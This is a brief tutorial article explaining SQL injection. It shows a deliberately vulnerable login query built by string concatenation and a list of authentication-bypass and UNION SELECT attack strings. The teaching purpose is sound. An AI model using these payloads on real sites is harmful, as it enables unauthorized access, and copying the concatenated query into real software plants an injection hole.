SQL Injection
What is SQL Injection?
SQL Injection is a vulnerability that allows an attacker to bypass username and password fields, potentially gaining access to normally classified information. SQL Injection generally affects the database layer of a site.
Triggering an SQL Injection
Suppose we had an SQL layer which filtered user input as follows (from HTML forms which get compared to database entries):
set successful = execute("SELECT * FROM tableOfUsers WHERE username='"& form("user")
& "' AND password='"& form("pwd") & "'");
if (not successful.EOF)
login success;
else
fail;
An attacker simply needs to inject the following code into the username form:
' or 1 = 1 --
This would cause the query to be:
SELECT * FROM tableOfUsers WHERE username='' or 1 = 1 -- & "' AND
password='"&form("pwd") & "'");
In SQL, '--' denotes a comment, so everything to the right of the query would get commented out, leaving just the expression 'or 1 = 1' which will always evaluate to true (1 is always equal to 1). The attacker can now log in without knowing the user's password. This is why it is important to properly parse user input.
SQL Attack Strings
The following are some examples of SQL Attack Strings:
' or 1=1 or ''='
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
" or 1=1--
or 1=1--
admin' --
admin' #
admin'/*
' UNION SELECT 1, 'username', 'password', 1--
Summary
Sites that utilize username and password fields in conjunction with SQL databases may simply have the above code copied and pasted into those fields by an attacker, breaching defenses. The victim's site needs to make sure that they sanitize input in order to avoid issues such as these. Note that there are more advanced SQL exploits using the UNION keyword.
Thank you for reading this article. If you have any suggestions or need clarification please do not hesitate to start a thread on my forum or to send me an e-mail. There is no such thing as a stupid question, but there is such a thing as a stupid fear of asking.
